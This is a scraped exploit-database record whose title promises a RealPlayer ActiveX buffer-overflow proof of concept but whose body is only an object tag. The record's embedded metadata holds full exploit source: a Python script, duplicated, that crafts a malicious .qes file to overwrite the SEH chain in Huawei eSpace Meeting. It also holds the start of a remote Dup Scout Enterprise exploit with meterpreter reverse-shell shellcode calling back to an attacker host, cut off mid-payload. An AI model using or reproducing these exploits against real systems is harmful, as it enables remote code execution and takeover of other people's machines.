ID 1337DAY-ID-10041
Type zdt
Reporter D3V!L FUCKER
Modified 2010-01-11T00:00:00
Description
Exploit for unknown platform in category local exploits
==============================================
Real Player ActiveX remote buffer overflow poc
==============================================
Software Link: [http://www.real.com]
Version: [12.0.0.343]
Tested on: [win XP sp2]
<!-- PoC fragment as archived: this single <object> element only instantiates the control the listing
     attributes to RealPlayer (classid CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA, DOM id 'target').
     No script, parameter or method call that would exercise the advertised buffer overflow appears
     anywhere on this page, so as listed the fragment merely loads the control; treat it as an
     incomplete / loading-only stub rather than a working trigger (TODO confirm against the original
     posting). Defender note: the CLSID is the identifier an ActiveX kill-bit or an IE/Office
     "allow-list" policy would key on, which is the usual mitigation for a vulnerable control of this
     kind; the affected version given on this page is 12.0.0.343, tested on Windows XP SP2. -->
<object classid='clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA' id='target' ></object>
# 0day.today [2018-03-19] #
{"published": "2010-01-11T00:00:00", "id": "1337DAY-ID-10041", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:47:00", "bulletin": {"published": "2010-01-11T00:00:00", "id": "1337DAY-ID-10041", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": null}, "hash": "b21e49bd37553dbaaeb65bea45180c32b1660c7f9719ec452e215f7f97bd3e13", "description": "Exploit for unknown platform in category local exploits", "type": "zdt", "lastseen": "2016-04-20T01:47:00", "edition": 1, "title": "Real Player ActiveX remote buffer overflow poc", "href": "http://0day.today/exploit/description/10041", "modified": "2010-01-11T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/10041", "references": [], "reporter": "D3V!L FUCKER", "sourceData": "==============================================\r\nReal Player ActiveX remote buffer overflow poc\r\n==============================================\r\n\r\nSoftware Link: [http://www.real.com]\r\nVersion: [12.0.0.343]\r\nTested on: [win XP sp2]\r\n \r\n \r\n<object classid='clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA' id='target' ></object>\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "ef8d54e4e607ea882c9bdd8018184d27", "key": "modified"}, {"hash": "7d29626c4592816a9a3054ddd60b76f7", "key": "sourceData"}, {"hash": "1c590f87f05e3dd4e4eed4f35f56dedb", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "31197ce2c0ddf6f29be28630b8b5b8af", "key": "reporter"}, {"hash": "ef8d54e4e607ea882c9bdd8018184d27", "key": "published"}, {"hash": "b6f0b5c2c11db073916796bee18fb666", "key": "description"}, {"hash": 
"8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "39204aed4291668fabc88073baefbadc", "key": "sourceHref"}, {"hash": "1ca6383ec81375ee810b54bdbf9ca5c2", "key": "title"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category local exploits", "hash": "7de119dbe6c24216142dfc7eb84120681310441eb080290a3c50b014f81740db", "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2018-03-19T15:20:21"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:46865"]}, {"type": "zdt", "idList": ["1337DAY-ID-32732", "1337DAY-ID-25351", "1337DAY-ID-26024", "1337DAY-ID-21357", "1337DAY-ID-21336", "1337DAY-ID-21196", "1337DAY-ID-21194", "1337DAY-ID-18889", "1337DAY-ID-18890", "1337DAY-ID-18885"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152965"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310874620", "OPENVAS:1361412562310813504", "OPENVAS:1361412562310813505", "OPENVAS:1361412562310882892", "OPENVAS:1361412562310813503"]}, {"type": "zeroscience", "idList": ["ZSL-2016-5324"]}], "modified": "2018-03-19T15:20:21"}, "vulnersScore": 0.7}, "type": "zdt", "lastseen": "2018-03-19T15:20:21", "edition": 2, "title": "Real Player ActiveX remote buffer overflow poc", "href": "https://0day.today/exploit/description/10041", "modified": "2010-01-11T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/10041", "references": [], "reporter": "D3V!L FUCKER", "sourceData": "==============================================\r\nReal Player ActiveX remote buffer overflow poc\r\n==============================================\r\n\r\nSoftware Link: [http://www.real.com]\r\nVersion: [12.0.0.343]\r\nTested on: [win XP sp2]\r\n \r\n \r\n<object classid='clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA' id='target' ></object>\r\n\r\n\n# 0day.today [2018-03-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": 
"d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b6f0b5c2c11db073916796bee18fb666", "key": "description"}, {"hash": "873fce856f9140c8490392bb643137b5", "key": "href"}, {"hash": "ef8d54e4e607ea882c9bdd8018184d27", "key": "modified"}, {"hash": "ef8d54e4e607ea882c9bdd8018184d27", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "31197ce2c0ddf6f29be28630b8b5b8af", "key": "reporter"}, {"hash": "bf9fcd50fbb224537c0920a094200985", "key": "sourceData"}, {"hash": "2c91e3f762158b34144a68a38eb58f5d", "key": "sourceHref"}, {"hash": "1ca6383ec81375ee810b54bdbf9ca5c2", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"exploitdb": [{"lastseen": "2019-05-20T08:19:52", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-20T00:00:00", "published": "2019-05-20T00:00:00", "id": "EDB-ID:46865", "href": "https://www.exploit-db.com/exploits/46865", "type": "exploitdb", "title": "Huawei eSpace Meeting 1.1.11.103 - 'cenwpoll.dll' SEH Buffer Overflow (Unicode)", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n#\r\n# Huawei eSpace Meeting cenwpoll.dll Unicode Stack Buffer Overflow with SEH Overwrite\r\n#\r\n#\r\n# Vendor: Huawei Technologies Co., Ltd.\r\n# Product web page: https://www.huawei.com\r\n# Affected application: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)\r\n# Affected application: Mobile Office eConference V200R003C01 6.0.0.268.v67290\r\n# Affected module: cenwpoll.dll 1.0.8.8\r\n# Binaries affected: mcstub.exe, classreader.exe, offlinepolledit.exe, eSpace.exe\r\n#\r\n# Product description:\r\n# --------------------\r\n# 1. Create more convenient Enhanced Communications (EC) services for your enterprise with this suite of\r\n# products. Huawei\u2019s EC Suite (ECS) solution combines voice, data, video, and service streams, and provides\r\n# users with easy and secure access to their service platform from any device, in any place, at any time.\r\n# 2. The eSpace Meeting allows you to join meetings that support voice, data, and video functions using\r\n# the PC client, the tablet client, or an IP phone, or in a meeting room with an MT deployed.\r\n#\r\n# Vulnerability description:\r\n# --------------------------\r\n# eSpace Meeting is prone to a stack-based buffer overflow vulnerability (seh overwrite) because it fails\r\n# to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer when\r\n# handling QES files. Attackers can exploit this issue to execute arbitrary code within the context of\r\n# the affected application. 
Failed exploit attempts will likely result in denial-of-service conditions.\r\n#\r\n# Tested on:\r\n# ----------\r\n# OS Name: Microsoft Windows 7 Professional\r\n# OS Version: 6.1.7601 Service Pack 1 Build 7601\r\n# RAM 4GB, System type: 32bit, Processor: Intel(R) Core(TM) i5-4300U CPU 1.90GHz 2.50GHz\r\n#\r\n# Vulnerability discovered by:\r\n# ----------------------------\r\n# Gjoko 'LiquidWorm' Krstic\r\n# Senior STTE\r\n# SCD-ERC\r\n# Munich, Germany\r\n# 26th of August (Tuesday), 2014\r\n#\r\n# PSIRT details:\r\n# --------------\r\n# Security advisory No.: Huawei-SA-20141217- espace\r\n# Initial release date: Dec 17, 2014\r\n# Vulnerability ID: HWPSIRT-2014-1151\r\n# CVE ID: CVE-2014-9415\r\n# Patched version: eSpace Meeting V100R001C03\r\n# Advisory URL: https://www.huawei.com/en/psirt/security-advisories/hw-406589\r\n# \r\n#\r\n# ------------------------------------ WinDBG output ------------------------------------\r\n#\r\n# m_dwCurrentPos = 0 ,dwData = 591 ,m_dwGrowSize = 4096(1db0.1828): Access violation - code c0000005 (first chance)\r\n# First chance exceptions are reported before any exception handling.\r\n# This exception may be expected and handled.\r\n# eax=00000000 ebx=00410041 ecx=00000000 edx=00000578 esi=08de1ad8 edi=00410045\r\n# eip=05790f3e esp=02fc906c ebp=02fecd00 iopl=0 nv up ei pl zr na pe nc\r\n# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\n# *** WARNING: Unable to verify checksum for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\cenwpoll.dll\r\n# *** ERROR: Symbol file could not be found. 
Defaulted to export symbols for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\cenwpoll.dll - \r\n# cenwpoll!DllUnregisterServer+0xa59e:\r\n# 05790f3e 8178082c010000 cmp dword ptr [eax+8],12Ch ds:0023:00000008=????????\r\n# 0:008> !exchain\r\n# 02feccf4: *** WARNING: Unable to verify checksum for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\mcstub.exe\r\n# *** ERROR: Module load completed but symbols could not be loaded for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\mcstub.exe\r\n# mcstub+10041 (00410041)\r\n# Invalid exception stack at 00410041\r\n# Instruction Address: 0x0000000005790f3e\r\n# \r\n# Description: Exception Handler Chain Corrupted\r\n# Short Description: ExceptionHandlerCorrupted\r\n# Exploitability Classification: EXPLOITABLE\r\n# Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at cenwpoll!DllUnregisterServer+0x000000000000a59e (Hash=0xbc5aacab.0x6c23bb0b)\r\n#\r\n# Corruption of the exception handler chain is considered exploitable\r\n#\r\n# 0:008> d ebp\r\n# 02fecd00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd50 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd60 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd70 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 0:008> u ebp\r\n# 02fecd00 41 inc ecx\r\n# 02fecd01 004100 add byte ptr [ecx],al\r\n# 02fecd04 41 inc ecx\r\n# 02fecd05 004100 add byte ptr [ecx],al\r\n# 02fecd08 41 inc ecx\r\n# 02fecd09 004100 add byte ptr [ecx],al\r\n# 02fecd0c 41 inc ecx\r\n# 02fecd0d 004100 add byte ptr [ecx],al\r\n#\r\n# ------------------------------------ /WinDBG output 
------------------------------------\r\n#\r\n#\r\n\r\nimport sys, os, time\r\n\r\nos.system('title jterm')\r\nos.system('color f5')\r\nos.system('cls')\r\npiton = os.path.basename(sys.argv[0])\r\n\r\ndef usage():\r\n\tprint '''\r\n\t+---------------------------------------------+\r\n\t| eSpace Meeting Stack Buffer Overflow Vuln |\r\n\t| |\r\n\t| Vuln ID: HWPSIRT-2014-1151 |\r\n\t| CVE ID: CVE-2014-9415 |\r\n\t+---------------------------------------------+\r\n\t'''\r\n\tif len(sys.argv) < 2:\r\n\t\tprint 'Usage: \\n\\n\\t'+piton+' <OPTION>'\r\n\t\tprint '\\nOPTION:\\n'\r\n\t\tprint '\\t0 - Create the evil PoC file.'\r\n\t\tprint '\\t1 - Create the evil file, start the vulnerable application and crash it.'\r\n\t\tprint '\\t2 - Create the evil file, start the vulnerable application under Windows Debugger with SEH chain info.\\n'\r\n\t\tquit()\r\n\r\nusage()\r\ncrash = sys.argv[1]\r\n\r\ndir = os.getcwd();\r\nfile = \"evilpoll.qes\"\r\nheader = '\\x56\\x34\\x78\\x12\\x01\\x00\\x09\\x00' # V4x.....\r\n\r\ntime.sleep(1)\r\n# Overwrite FS:[0] chain (\\x43 = EIP)\r\nbuffer = '\\x41' * 353 +'\\x42' * 2 +'\\x43' * 2 +'\\x44' * 42 +'New Poll' # \\x44 can be incremented (byte space for venetian shellcode)\r\nbuffer += '\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x90'\r\nbuffer += '\\x85\\xA9\\xD7\\x00\\x01\\x04\\x00'\r\nbuffer += 'TEST'+'\\x01\\x02\\x05\\x00'\r\nbuffer += 'ANSW1'+'\\x05\\x00'\r\nbuffer += 'ANSW2'\r\n\r\npoc = header + buffer\r\nbytes = len(poc)\r\n\r\nprint '[+] Creating evil PoC file...'\r\ntime.sleep(1)\r\nprint '[+] Buffering:\\n'\r\ntime.sleep(1)\r\n\r\nindex = 0\r\nwhile index < len(poc):\r\n\tchar = poc[index]\r\n\t#print char,\r\n\tsys.stdout.write(char)\r\n\ttime.sleep(10.0 / 1000.0)\r\n\tindex = index + 1\r\n\r\ntry:\r\n\twriteFile = open (file, 'w')\r\n\twriteFile.write( poc )\r\n\twriteFile.close()\r\n\ttime.sleep(1)\r\n\tprint '\\n\\n[+] File \\\"'+file+'\\\" successfully created!'\r\n\ttime.sleep(1)\r\n\tprint '[+] Location: \"'+dir+'\"'\r\n\tprint '[+] 
Wrote '+str(bytes)+' bytes.'\r\nexcept:\r\n\tprint '[-] Error while creating file!\\n'\r\n\r\nif crash == '0':\r\n\tprint '\\n\\n[+] Done!\\n'\r\nelif crash == '1':\r\n\tprint '[+] The script will now execute the vulnerable application with the PoC file as its argument.\\n'\r\n\tos.system('pause')\r\n\tos.system('C:\\\\Progra~1\\\\eSpace-ecs\\\\conf\\\\cwbin\\\\classreader.exe \"%~dp0evilpoll.qes\"')\r\nelif crash == '2':\r\n\tprint '[+] The script will now execute the vulnerable application with the PoC file as its argument under Windows Debugger.\\n'\r\n\tos.system('pause')\r\n\tos.system('C:\\\\Progra~1\\\\Debugg~1\\\\windbg.exe -Q -g -c \"!exchain\" -o \"C:\\\\Progra~1\\eSpace-ecs\\conf\\cwbin\\classreader.exe\" \"%~dp0evilpoll.qes\"')\r\n\tprint '\\n[+] You should see something like this in WinDBG:'\r\n\tprint '''\r\n\t0:000> d 0012e37c\r\n\t0012e37c 42 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00 B.B.C.C.D.D.D.D.\r\n\t0012e38c 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.\r\n\t0012e39c 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.\r\n\t0012e3ac 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.\r\n\t0012e3bc 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.\r\n\t0012e3cc 44 00 44 00 44 00 44 00-44 00 44 00 4e 00 65 00 D.D.D.D.D.D.N.e.\r\n\t0012e3dc 77 00 20 00 50 00 6f 00-6c 00 6c 00 00 00 00 00 w. .P.o.l.l.....\r\n\t0012e3ec c2 01 00 00 56 34 78 12-70 09 87 02 00 00 00 00 ....V4x.p.......\r\n\t0:000> !exchain\r\n\t0012e37c: 00430043\r\n\tInvalid exception stack at 00420042\r\n\t'''\r\nelse:\r\n\tprint '[+] Have a nice day! ^^\\n'\r\n\tquit()\r\n\r\nprint '\\n[+] Have a nice day! 
^^\\n'\r\n#os.system('color 07')", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/46865"}], "zdt": [{"lastseen": "2019-05-21T01:54:26", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-05-19T00:00:00", "published": "2019-05-19T00:00:00", "id": "1337DAY-ID-32732", "href": "https://0day.today/exploit/description/32732", "title": "Huawei eSpace Meeting 1.1.11.103 - (cenwpoll.dll) SEH Buffer Overflow (Unicode) Exploit", "type": "zdt", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n#\r\n# Huawei eSpace Meeting cenwpoll.dll Unicode Stack Buffer Overflow with SEH Overwrite\r\n#\r\n#\r\n# Vendor: Huawei Technologies Co., Ltd.\r\n# Product web page: https://www.huawei.com\r\n# Affected application: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)\r\n# Affected application: Mobile Office eConference V200R003C01 6.0.0.268.v67290\r\n# Affected module: cenwpoll.dll 1.0.8.8\r\n# Binaries affected: mcstub.exe, classreader.exe, offlinepolledit.exe, eSpace.exe\r\n#\r\n# Product description:\r\n# --------------------\r\n# 1. Create more convenient Enhanced Communications (EC) services for your enterprise with this suite of\r\n# products. Huawei\u2019s EC Suite (ECS) solution combines voice, data, video, and service streams, and provides\r\n# users with easy and secure access to their service platform from any device, in any place, at any time.\r\n# 2. 
The eSpace Meeting allows you to join meetings that support voice, data, and video functions using\r\n# the PC client, the tablet client, or an IP phone, or in a meeting room with an MT deployed.\r\n#\r\n# Vulnerability description:\r\n# --------------------------\r\n# eSpace Meeting is prone to a stack-based buffer overflow vulnerability (seh overwrite) because it fails\r\n# to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer when\r\n# handling QES files. Attackers can exploit this issue to execute arbitrary code within the context of\r\n# the affected application. Failed exploit attempts will likely result in denial-of-service conditions.\r\n#\r\n# Tested on:\r\n# ----------\r\n# OS Name: Microsoft Windows 7 Professional\r\n# OS Version: 6.1.7601 Service Pack 1 Build 7601\r\n# RAM 4GB, System type: 32bit, Processor: Intel(R) Core(TM) i5-4300U CPU 1.90GHz 2.50GHz\r\n#\r\n# Vulnerability discovered by:\r\n# ----------------------------\r\n# Gjoko 'LiquidWorm' Krstic\r\n# Senior STTE\r\n# SCD-ERC\r\n# Munich, Germany\r\n# 26th of August (Tuesday), 2014\r\n#\r\n# PSIRT details:\r\n# --------------\r\n# Security advisory No.: Huawei-SA-20141217- espace\r\n# Initial release date: Dec 17, 2014\r\n# Vulnerability ID: HWPSIRT-2014-1151\r\n# CVE ID: CVE-2014-9415\r\n# Patched version: eSpace Meeting V100R001C03\r\n# Advisory URL: https://www.huawei.com/en/psirt/security-advisories/hw-406589\r\n# \r\n#\r\n# ------------------------------------ WinDBG output ------------------------------------\r\n#\r\n# m_dwCurrentPos = 0 ,dwData = 591 ,m_dwGrowSize = 4096(1db0.1828): Access violation - code c0000005 (first chance)\r\n# First chance exceptions are reported before any exception handling.\r\n# This exception may be expected and handled.\r\n# eax=00000000 ebx=00410041 ecx=00000000 edx=00000578 esi=08de1ad8 edi=00410045\r\n# eip=05790f3e esp=02fc906c ebp=02fecd00 iopl=0 nv up ei pl zr na pe nc\r\n# cs=001b ss=0023 ds=0023 es=0023 
fs=003b gs=0000 efl=00010246\r\n# *** WARNING: Unable to verify checksum for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\cenwpoll.dll\r\n# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\cenwpoll.dll - \r\n# cenwpoll!DllUnregisterServer+0xa59e:\r\n# 05790f3e 8178082c010000 cmp dword ptr [eax+8],12Ch ds:0023:00000008=????????\r\n# 0:008> !exchain\r\n# 02feccf4: *** WARNING: Unable to verify checksum for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\mcstub.exe\r\n# *** ERROR: Module load completed but symbols could not be loaded for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\mcstub.exe\r\n# mcstub+10041 (00410041)\r\n# Invalid exception stack at 00410041\r\n# Instruction Address: 0x0000000005790f3e\r\n# \r\n# Description: Exception Handler Chain Corrupted\r\n# Short Description: ExceptionHandlerCorrupted\r\n# Exploitability Classification: EXPLOITABLE\r\n# Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at cenwpoll!DllUnregisterServer+0x000000000000a59e (Hash=0xbc5aacab.0x6c23bb0b)\r\n#\r\n# Corruption of the exception handler chain is considered exploitable\r\n#\r\n# 0:008> d ebp\r\n# 02fecd00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd50 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd60 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 02fecd70 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n# 0:008> u ebp\r\n# 02fecd00 41 inc ecx\r\n# 02fecd01 004100 add byte ptr [ecx],al\r\n# 02fecd04 41 inc ecx\r\n# 02fecd05 004100 add byte ptr [ecx],al\r\n# 02fecd08 
41 inc ecx\r\n# 02fecd09 004100 add byte ptr [ecx],al\r\n# 02fecd0c 41 inc ecx\r\n# 02fecd0d 004100 add byte ptr [ecx],al\r\n#\r\n# ------------------------------------ /WinDBG output ------------------------------------\r\n#\r\n#\r\n\r\nimport sys, os, time\r\n\r\nos.system('title jterm')\r\nos.system('color f5')\r\nos.system('cls')\r\npiton = os.path.basename(sys.argv[0])\r\n\r\ndef usage():\r\n\tprint '''\r\n\t+---------------------------------------------+\r\n\t| eSpace Meeting Stack Buffer Overflow Vuln |\r\n\t| |\r\n\t| Vuln ID: HWPSIRT-2014-1151 |\r\n\t| CVE ID: CVE-2014-9415 |\r\n\t+---------------------------------------------+\r\n\t'''\r\n\tif len(sys.argv) < 2:\r\n\t\tprint 'Usage: \\n\\n\\t'+piton+' <OPTION>'\r\n\t\tprint '\\nOPTION:\\n'\r\n\t\tprint '\\t0 - Create the evil PoC file.'\r\n\t\tprint '\\t1 - Create the evil file, start the vulnerable application and crash it.'\r\n\t\tprint '\\t2 - Create the evil file, start the vulnerable application under Windows Debugger with SEH chain info.\\n'\r\n\t\tquit()\r\n\r\nusage()\r\ncrash = sys.argv[1]\r\n\r\ndir = os.getcwd();\r\nfile = \"evilpoll.qes\"\r\nheader = '\\x56\\x34\\x78\\x12\\x01\\x00\\x09\\x00' # V4x.....\r\n\r\ntime.sleep(1)\r\n# Overwrite FS:[0] chain (\\x43 = EIP)\r\nbuffer = '\\x41' * 353 +'\\x42' * 2 +'\\x43' * 2 +'\\x44' * 42 +'New Poll' # \\x44 can be incremented (byte space for venetian shellcode)\r\nbuffer += '\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x90'\r\nbuffer += '\\x85\\xA9\\xD7\\x00\\x01\\x04\\x00'\r\nbuffer += 'TEST'+'\\x01\\x02\\x05\\x00'\r\nbuffer += 'ANSW1'+'\\x05\\x00'\r\nbuffer += 'ANSW2'\r\n\r\npoc = header + buffer\r\nbytes = len(poc)\r\n\r\nprint '[+] Creating evil PoC file...'\r\ntime.sleep(1)\r\nprint '[+] Buffering:\\n'\r\ntime.sleep(1)\r\n\r\nindex = 0\r\nwhile index < len(poc):\r\n\tchar = poc[index]\r\n\t#print char,\r\n\tsys.stdout.write(char)\r\n\ttime.sleep(10.0 / 1000.0)\r\n\tindex = index + 1\r\n\r\ntry:\r\n\twriteFile = open (file, 'w')\r\n\twriteFile.write( poc 
)\r\n\twriteFile.close()\r\n\ttime.sleep(1)\r\n\tprint '\\n\\n[+] File \\\"'+file+'\\\" successfully created!'\r\n\ttime.sleep(1)\r\n\tprint '[+] Location: \"'+dir+'\"'\r\n\tprint '[+] Wrote '+str(bytes)+' bytes.'\r\nexcept:\r\n\tprint '[-] Error while creating file!\\n'\r\n\r\nif crash == '0':\r\n\tprint '\\n\\n[+] Done!\\n'\r\nelif crash == '1':\r\n\tprint '[+] The script will now execute the vulnerable application with the PoC file as its argument.\\n'\r\n\tos.system('pause')\r\n\tos.system('C:\\\\Progra~1\\\\eSpace-ecs\\\\conf\\\\cwbin\\\\classreader.exe \"%~dp0evilpoll.qes\"')\r\nelif crash == '2':\r\n\tprint '[+] The script will now execute the vulnerable application with the PoC file as its argument under Windows Debugger.\\n'\r\n\tos.system('pause')\r\n\tos.system('C:\\\\Progra~1\\\\Debugg~1\\\\windbg.exe -Q -g -c \"!exchain\" -o \"C:\\\\Progra~1\\eSpace-ecs\\conf\\cwbin\\classreader.exe\" \"%~dp0evilpoll.qes\"')\r\n\tprint '\\n[+] You should see something like this in WinDBG:'\r\n\tprint '''\r\n\t0:000> d 0012e37c\r\n\t0012e37c 42 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00 B.B.C.C.D.D.D.D.\r\n\t0012e38c 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.\r\n\t0012e39c 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.\r\n\t0012e3ac 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.\r\n\t0012e3bc 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.\r\n\t0012e3cc 44 00 44 00 44 00 44 00-44 00 44 00 4e 00 65 00 D.D.D.D.D.D.N.e.\r\n\t0012e3dc 77 00 20 00 50 00 6f 00-6c 00 6c 00 00 00 00 00 w. .P.o.l.l.....\r\n\t0012e3ec c2 01 00 00 56 34 78 12-70 09 87 02 00 00 00 00 ....V4x.p.......\r\n\t0:000> !exchain\r\n\t0012e37c: 00430043\r\n\tInvalid exception stack at 00420042\r\n\t'''\r\nelse:\r\n\tprint '[+] Have a nice day! ^^\\n'\r\n\tquit()\r\n\r\nprint '\\n[+] Have a nice day! 
^^\\n'\r\n#os.system('color 07')\n\n# 0day.today [2019-05-21] #", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/32732"}, {"lastseen": "2018-03-19T13:16:32", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2016-10-05T00:00:00", "published": "2016-10-05T00:00:00", "id": "1337DAY-ID-25351", "href": "https://0day.today/exploit/description/25351", "type": "zdt", "title": "Dup Scout Enterprise 9.0.28 - Buffer Overflow Exploit", "sourceData": "#!/usr/bin/python\r\n \r\nprint \"Dup Scout Enterprise 9.0.28 Buffer Overflow Exploit\"\r\nprint \"Author: Tulpa / tulpa[at]tulpa-security[dot]com\"\r\n \r\n#Author website: www.tulpa-security.com\r\n#Author twitter: @tulpa_security\r\n \r\n#Exploit will land you NT AUTHORITY\\SYSTEM\r\n#You do not need to be authenticated, password below is garbage\r\n#Swop out IP, shellcode and remember to adjust '\\x41' for bytes\r\n#Tested on Windows 7 x86 Enterprise SP1\r\n \r\n#Shout-out to carbonated and ozzie_offsec\r\n \r\nimport socket\r\nimport sys\r\n \r\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nconnect=s.connect(('192.168.123.132',80))\r\n \r\n#bad chars \\x00\\x0a\\x0d\\x26\r\n \r\n#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\\x00\\x0a\\x0d\\x26' -f python --smallest\r\n \r\n#payload size 308\r\n \r\nbuf = \"\"\r\nbuf += \"\\xda\\xd9\\xba\\x43\\x1b\\x3f\\x40\\xd9\\x74\\x24\\xf4\\x58\\x2b\"\r\nbuf += \"\\xc9\\xb1\\x47\\x31\\x50\\x18\\x03\\x50\\x18\\x83\\xc0\\x47\\xf9\"\r\nbuf += \"\\xca\\xbc\\xaf\\x7f\\x34\\x3d\\x2f\\xe0\\xbc\\xd8\\x1e\\x20\\xda\"\r\nbuf += \"\\xa9\\x30\\x90\\xa8\\xfc\\xbc\\x5b\\xfc\\x14\\x37\\x29\\x29\\x1a\"\r\nbuf += \"\\xf0\\x84\\x0f\\x15\\x01\\xb4\\x6c\\x34\\x81\\xc7\\xa0\\x96\\xb8\"\r\nbuf += 
